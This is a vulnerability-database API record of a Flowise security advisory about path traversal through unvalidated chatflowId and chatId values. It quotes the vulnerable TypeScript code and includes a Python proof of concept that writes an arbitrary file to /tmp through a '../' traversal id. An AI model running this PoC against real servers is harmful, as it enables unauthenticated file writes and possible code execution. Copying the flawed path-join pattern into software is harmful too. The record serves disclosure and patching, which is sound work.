Vulnerability Instance
Lookup for vulnerabilities affecting packages.
GET /api/vulnerabilities/360549?format=api
{ "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360549?format=api", "vulnerability_id": "VCID-g7y6-euhd-jqhh", "summary": "Flowise has arbitrary file access due to missing chat flow id validation\n### Summary\n\nMissing chat flow id validation allows an attacker to access arbitrary file.\n\n### Details\n\nCommit https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f and https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7 added check for `filename` when handling file upload operations to prevent path traversal, and additional validation of `chatflowId` and `chatId` from route `/api/v1/attachments`. In some cases, however, `chatflowId` and `chatId` are not validated to ensure they are UUIDs or numbers, which may lead to security issues.\n\n**Case 1**\n\nWhen creating new chatflow via `/api/v1/chatflows`, function `addBase64FilesToStorage` is called if there exists base64 file data. Although the `filename` is sanitized, the `chatflowid` comes from request body directly without any validation. An attacker could exploit the path traversal here to write arbitrary file with controlled data.\n\n```typescript\nexport const addBase64FilesToStorage = async (fileBase64: string, chatflowid: string, fileNames: string[]) => {\n // ...\n } else {\n const dir = path.join(getStoragePath(), chatflowid) // path traversal here\n if (!fs.existsSync(dir)) {\n fs.mkdirSync(dir, { recursive: true })\n }\n\n const splitDataURI = fileBase64.split(',')\n const filename = splitDataURI.pop()?.split(':')[1] ?? 
''\n const bf = Buffer.from(splitDataURI.pop() || '', 'base64')\n const sanitizedFilename = _sanitizeFilename(filename)\n\n const filePath = path.join(dir, sanitizedFilename)\n fs.writeFileSync(filePath, bf)\n fileNames.push(sanitizedFilename)\n return 'FILE-STORAGE::' + JSON.stringify(fileNames)\n }\n}\n```\n\n**Case 2**\n\nWhen downloading file via `/api/v1/openai-assistants-file/download` or `/api/v1/get-upload-file`, function `streamStorageFile` is called to retrieve file data from local or cloud bucket. The `chatflowId` and `chatId` are used for file path generation. Take Amazon S3 as an example, its [documentation indicates](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines) that `../` will be treated as relative path.\n\nNote that these APIs are in `WHITELIST_URLS`, an attacker may traverse user storage files without authentication.\n\n### PoC\n\nLaunch app at localhost with default config, then run the following python script, a file named 'pwn' will be written to dir `/tmp` with content 'Hello, World!'.\n\n```python\nimport requests\nimport json\nurl = \"http://localhost:8080/api/v1/chatflows\"\nheaders = {\"x-request-from\": \"internal\"}\nnodedata = {\n \"category\" : \"Document Loaders\",\n \"inputs\" : {\n \"key\" : \"data:text/plain;base64,SGVsbG8sIFdvcmxkIQ==,a:pwn\"\n }\n}\nflownode = {\n \"id\" : \"a\",\n \"data\" : nodedata\n}\nflowdata = {\n \"nodes\" : [flownode],\n \"edges\" : [],\n \"viewport\" : {\n \"x\" : 1,\n \"y\" : 1,\n \"zoom\" : 1\n }\n}\ndata = {\n \"id\" : \"../../../../../tmp\",\n \"name\" : \"name\",\n \"flowData\" : json.dumps(flowdata)\n}\nres = requests.post(url, json=data, headers=headers)\n```\n\n### Impact\n\n1. Arbitrary file read / write\n2. Remote Code Execution\n3. 
Data loss", "aliases": [ { "alias": "GHSA-q67q-549q-p849" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34612?format=api", "purl": "pkg:npm/flowise@3.0.6", "is_vulnerable": true, "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6" } ], "affected_packages": [
{ "url": "http://public2.vulnerablecode.io/api/packages/395072?format=api", "purl": "pkg:npm/flowise@2.2.8", "is_vulnerable": true, "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@2.2.8" },
{ "url": "http://public2.vulnerablecode.io/api/packages/823706?format=api", "purl": "pkg:npm/flowise@3.0.0", "is_vulnerable": true, "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.0" },
{ "url": "http://public2.vulnerablecode.io/api/packages/34324?format=api", "purl": "pkg:npm/flowise@3.0.1", "is_vulnerable": true, "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.1" },
{ "url": "http://public2.vulnerablecode.io/api/packages/823707?format=api", "purl": "pkg:npm/flowise@3.0.2", "is_vulnerable": true, "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.2" },
{ "url": "http://public2.vulnerablecode.io/api/packages/823708?format=api", "purl": "pkg:npm/flowise@3.0.3", "is_vulnerable": true, "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.3" },
{ "url": "http://public2.vulnerablecode.io/api/packages/823709?format=api", "purl": "pkg:npm/flowise@3.0.4", "is_vulnerable": true, "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.4" },
{ "url": "http://public2.vulnerablecode.io/api/packages/34083?format=api", "purl": "pkg:npm/flowise@3.0.5", "is_vulnerable": true, "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.5" } ], "references": [ { "reference_url": "https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849" }, { 
"reference_url": "https://github.com/advisories/GHSA-q67q-549q-p849", "reference_id": "GHSA-q67q-549q-p849", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-q67q-549q-p849" } ], "weaknesses": [ { "cwe_id": 22, "name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory." }, { "cwe_id": 937, "name": "OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities", "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013." }, { "cwe_id": 1035, "name": "OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities", "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017." } ], "exploits": [], "severity_range_score": "9.0 - 10.0", "exploitability": "0.5", "weighted_severity": "9.0", "risk_score": 4.5, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g7y6-euhd-jqhh" }